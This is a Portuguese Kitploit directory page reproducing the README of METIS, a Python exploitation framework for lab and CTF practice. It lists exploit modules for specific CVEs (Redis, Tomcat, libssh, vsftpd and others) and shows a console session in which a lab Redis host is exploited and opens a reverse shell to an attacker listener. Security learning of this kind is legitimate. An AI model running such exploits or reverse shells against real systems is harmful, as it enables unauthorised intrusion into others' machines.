Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
METIS — Framework modular de exploração em Python com um console no estilo Metasploit, módulos Exploit e Auxiliary com registro automático, verificações de três estados e múltiplos transportes de sessão para alvos de laboratório e CTF. | Kitploit
Ferramentas/GitHubGitHub/k3ystr0k3r/metis
Frameworks de Testes de PenetraçãoScanners de VulnerabilidadesFrameworks de ExploraçãoExploraçãoPós-ExploraçãoCTFTestes de PenetraçãoComando e ControleAprendizado e EducaçãoRed TeamingFerramenta de Acesso RemotoDesenvolvimento de Payloads
323há 19h 11mAinda não revisado
GitHubk3ystr0k3r/metis

METIS

Framework modular de exploração em Python com um console no estilo Metasploit, módulos Exploit e Auxiliary com registro automático, verificações de três estados e múltiplos transportes de sessão para alvos de laboratório e CTF.

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

METIS - Modular Exploitation & Threat Intelligence Framework

███╗   ███╗███████╗████████╗██╗███████╗
████╗ ████║██╔════╝╚══██╔══╝██║██╔════╝
██╔████╔██║█████╗     ██║   ██║███████╗
██║╚██╔╝██║██╔══╝     ██║   ██║╚════██║
██║ ╚═╝ ██║███████╗   ██║   ██║███████║
╚═╝     ╚═╝╚══════╝   ╚═╝   ╚═╝╚══════╝

Um framework de exploração em Python criado para aprendizado. Arquitetura modular, console temático, múltiplos transportes de sessão e uma biblioteca crescente de módulos CVE.


Community Driven

METIS é um framework de pesquisa de segurança orientado pela comunidade. O objetivo é construir uma coleção crescente de módulos contribuídos por pesquisadores de segurança, desenvolvedores e a comunidade em geral.

Tem um scanner útil, módulo auxiliar, módulo de exploit ou outra ferramenta de pesquisa de segurança que gostaria de compartilhar? Adicione ao METIS e abra um Pull Request.

Todas as contribuições são bem-vindas, desde que sigam a estrutura de módulos do projeto, os padrões de código e as diretrizes de uso autorizado.

Seja adicionando um novo módulo CVE, melhorando um módulo existente, corrigindo um bug ou construindo nova funcionalidade do framework, suas contribuições podem ajudar a tornar o METIS melhor para todos.

Veja Writing modules abaixo para informações sobre como criar seu próprio módulo.


What it is

METIS é um framework modular de C2/exploração escrito em Python. Ele executa um console interativo no estilo Metasploit, onde você seleciona módulos, define opções, executa verificações e obtém sessões contra alvos de laboratório.

Ele foi projetado para:

  • Aprendizado de como frameworks de exploração funcionam por baixo dos panos
  • Trabalho em laboratório contra VMs e containers vulneráveis
  • Prática de CTF onde um framework scriptável é mais rápido que ferramentas manuais
  • Contribuições da comunidade por meio de módulos personalizados e melhorias no framework

Ele não foi projetado para:

  • Atacar sistemas que você não possui ou não tem permissão escrita para testar
  • Engajamentos de red-team em produção (use Cobalt Strike, Sliver ou Mythic)
  • Qualquer coisa na internet pública

Features

  • Arquitetura modular — coloque um arquivo .py em modules/ e ele se registra automaticamente
  • Dois tipos de módulo — Exploit (gera sessões) e Auxiliary (scanners, enumeradores)
  • check() tri-estado — todo módulo pode verificar antes de atacar (VULNERABLE / SAFE / UNKNOWN)
  • Múltiplos transportes de sessão — sockets reversos, sockets bind, canais paramiko, webshells HTTP, telnet bruto
  • Escaneamento com threads — especificações de alvo CIDR/lista separada por vírgulas/intervalo/file: com barras de progresso ao vivo
  • Console temático — 22 esquemas de cores embutidos com gradientes de barra de progresso por tema
  • Automação por arquivo RC — script de fluxos de trabalho completos
  • Arquivos SOURCE por módulo — carregue opções de arquivos KEY=VALUE
  • Escape para shell local — execute qualquer comando de shell sem sair do framework
  • Núcleo enxuto — dependências e abstrações deliberadamente mínimas

Modules

Auxiliary — scanners e enumeradores

ModuleDescription
auxiliary/scanner/tcp_connectScanner de portas TCP com threads
auxiliary/scanner/hikvision_cve_2017_7921Bypass de autenticação + enumeração de usuários em câmera IP Hikvision
auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847Vazamento de credenciais do MikroTik WinBox
auxiliary/scanner/redis_cve_2022_0543Detector de escape do sandbox Lua do Redis

Exploits — geradores de sessão

ModuleSession type
exploit/unix/ftp/vsftpd_234_backdoorSocket bind
exploit/multi/http/ghost_cms_handlebars_rceSocket reverso
exploit/multi/http/langflow_rce_cve_2026_9198Socket reverso
exploit/multi/http/budibase_plugin_upload_rce_cve_2026_31816Socket reverso
exploit/multi/http/activemq_jolokia_rce_cve_2026_34197Socket reverso
exploit/multi/http/tomcat_put_rce_cve_2017_12615Socket reverso
exploit/multi/http/joomla_jce_rce_cve_2026_48907Webshell HTTP
exploit/linux/http/freepbx_sqli_rce_cve_2025_57819Reverso atrasado (cron)
exploit/linux/redis/redis_cve_2022_0543_rceSocket reverso
exploit/linux/ssh/libssh_auth_bypass_cve_2018_10933Canal Paramiko
exploit/linux/telnet/inetutils_telnetd_bypass_cve_2026_24061Socket telnet bruto

Install

Requer Python 3.10+ e git.

git clone https://github.com/K3ysTr0K3R/METIS.git
cd METIS

python3 -m venv .venv
source .venv/bin/activate

pip install -r requirements.txt

requirements.txt:

pwntools>=4.11.0
requests>=2.31.0
paramiko>=3.0.0
redis>=5.0.0
cryptography>=42.0.0
rich>=13.7.0
prompt_toolkit>=3.0.43

Executar:

python3 metis.py

Usage

metis > show modules

  #    Module                                                        Date        Rank       Chk  Description
  --   ------------------------------------------------------------  ----------  ---------  ---  -----------
  1    auxiliary/scanner/hikvision_cve_2017_7921                     2017-09-23  normal     Yes  Hikvision IP Camera Authentication Bypass (CVE-2017-7921)
  2    auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847        2018-08-01  great      Yes  MikroTik WinBox Credential Leak (CVE-2018-14847)
  ...
  15   exploit/unix/ftp/vsftpd_234_backdoor                          2011-07-03  excellent  Yes  vsftpd 2.3.4 Backdoor Command Execution

metis > search redis

  #   Module                                       Date        Rank       Chk  Description
  --  ------                                       ----       ----       ---  -----------
  1   auxiliary/scanner/redis_cve_2022_0543        2022-02-18  excellent  Yes  Redis CVE-2022-0543 Scanner
  2   exploit/linux/redis/redis_cve_2022_0543_rce  2022-02-18  excellent  Yes  Redis CVE-2022-0543 Lua Sandbox Escape RCE

metis > use 2
[*] using exploit/linux/redis/redis_cve_2022_0543_rce
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set RHOST 192.168.56.101
[+] RHOST => 192.168.56.101
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set LHOST 192.168.56.1
[+] LHOST => 192.168.56.1
metis exploit(linux/redis/redis_cve_2022_0543_rce) > check
[*] check: probing 192.168.56.101:6379
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[*] check -> vulnerable
metis exploit(linux/redis/redis_cve_2022_0543_rce) > exploit
[*] running check() before exploit (AUTOCHECK=true)
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[+] target appears vulnerable — proceeding
[*] listening on 192.168.56.1:4444 for reverse shell
[+] shell from 192.168.56.101:51234
[+] new session: <Session a3f2b1c4 192.168.56.101:51234>

metis exploit(linux/redis/redis_cve_2022_0543_rce) > sessions
  a3f2b1c4  192.168.56.101:51234  (alive)

metis exploit(linux/redis/redis_cve_2022_0543_rce) > interact a3f2b1c4
[*] interacting with a3f2b1c4. 'background' returns, '!cmd' runs locally.
a3f2b1c4 $ id
uid=105(redis) gid=108(redis) groups=108(redis)
a3f2b1c4 $ background
metis >

Common commands

Baixar ferramenta